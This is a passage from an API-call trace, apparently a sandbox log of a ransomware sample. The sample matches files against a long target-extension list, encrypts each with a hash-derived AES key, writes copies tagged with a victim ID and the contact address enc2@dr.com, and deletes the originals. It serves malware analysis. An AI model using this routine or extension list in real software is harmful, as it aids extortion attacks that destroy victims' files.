.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0175.258] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.258] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.258] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.261] ReadFile (in: hFile=0x390, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x71d, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x18a640*=0x71d, lpOverlapped=0x0) returned 1
	[0175.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.266] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb198) returned 1
	[0175.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.268] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0175.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.269] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0175.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.269] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9670) returned 1
	[0175.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.269] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x71d, dwBufLen=0x71d | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x720) returned 1
	[0175.269] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.270] RtlMoveMemory (in: Destination=0xfde400, Source=0xfdc138, Length=0x71d | out: Destination=0xfde400) 
	[0175.270] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.270] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfde400*, pdwDataLen=0x18a1ec*=0x71d, dwBufLen=0x720 | out: pbData=0xfde400*, pdwDataLen=0x18a1ec*=0x720) returned 1
	[0175.270] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.271] CryptDestroyKey (hKey=0xfb9670) returned 1
	[0175.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.271] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0175.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.271] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0175.271] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.272] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.272] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.272] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0175.273] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 141
	[0175.274] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.274] WriteFile (in: hFile=0x39c, lpBuffer=0xfde400*, nNumberOfBytesToWrite=0x720, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfde400*, lpNumberOfBytesWritten=0x18a648*=0x720, lpOverlapped=0x0) returned 1
	[0175.278] CloseHandle (hObject=0x39c) returned 1
	[0175.280] CloseHandle (hObject=0x390) returned 1
	[0175.280] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml")) returned 1
	[0175.283] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml")) returned 0
	[0175.284] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18cef80, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa18cef80, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa18cef80, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0175.284] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="..") returned 1
	[0175.284] lstrcmpW (lpString1="MasterDatastore.xml", lpString2=".") returned 1
	[0175.284] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\"
	[0175.284] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\", lpString2="MasterDatastore.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml"
	[0175.284] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml") returned 100
	[0175.284] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.285] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml") returned 0x64
	[0175.285] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.285] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0175.285] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml"
	[0175.285] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml") returned 100
	[0175.285] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.286] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.286] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0175.286] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.286] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0175.287] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.287] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.287] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.288] ReadFile (in: hFile=0x390, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x18a640*=0x10f, lpOverlapped=0x0) returned 1
	[0175.291] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.292] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcba18) returned 1
	[0175.294] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.295] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0175.295] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.295] CryptHashData (hHash=0xfb91b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0175.295] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.295] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb91b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9670) returned 1
	[0175.295] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.295] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x10f, dwBufLen=0x10f | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x110) returned 1
	[0175.296] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.296] RtlMoveMemory (in: Destination=0xfdc6a8, Source=0xfdcd58, Length=0x10f | out: Destination=0xfdc6a8) 
	[0175.296] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.296] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x10f, dwBufLen=0x110 | out: pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x110) returned 1
	[0175.297] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.297] CryptDestroyKey (hKey=0xfb9670) returned 1
	[0175.297] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.297] CryptDestroyHash (hHash=0xfb91b0) returned 1
	[0175.297] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.298] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0175.298] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.298] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.299] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.299] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0175.300] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 142
	[0175.300] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.301] WriteFile (in: hFile=0x39c, lpBuffer=0xfdc6a8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdc6a8*, lpNumberOfBytesWritten=0x18a648*=0x110, lpOverlapped=0x0) returned 1
	[0175.304] CloseHandle (hObject=0x39c) returned 1
	[0175.304] CloseHandle (hObject=0x390) returned 1
	[0175.305] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml")) returned 1
	[0175.318] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml")) returned 0
	[0175.318] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0175.318] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0175.319] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0175.319] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
